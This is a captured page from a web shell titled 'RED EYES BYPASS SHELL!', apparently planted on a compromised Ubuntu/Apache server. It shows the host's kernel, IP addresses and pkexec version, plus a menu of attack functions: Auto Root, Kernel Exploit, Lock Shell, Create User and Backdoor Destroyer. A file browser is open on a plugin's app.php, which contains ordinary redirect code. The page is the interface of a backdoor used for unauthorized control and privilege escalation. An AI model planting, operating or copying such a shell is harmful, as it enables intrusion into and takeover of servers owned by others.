Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
user /
plugins /
officeLive /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
i18n
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
app.php
745
B
-rw-r--r--
package.json
1.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app.php
<?php class officeLivePlugin extends PluginBase{ function __construct(){ parent::__construct(); } public function regiest(){ $this->hookRegiest(array( 'user.commonJs.insert' => 'officeLivePlugin.echoJs' )); } public function echoJs($st,$act){ if($this->isFileExtence($st,$act)){ $this->echoFile('static/main.js'); } } public function index(){ if(substr($this->in['path'],0,4) == 'http'){ $path = $fileUrl = $this->in['path']; }else{ $path = _DIR($this->in['path']); $fileUrl = _make_file_proxy($path); if (!file_exists($path)) { show_tips(LNG('not_exists')); } } $config = $this->getConfig(); header('Location:'.$config['apiServer'].rawurlencode($fileUrl)); } }
Close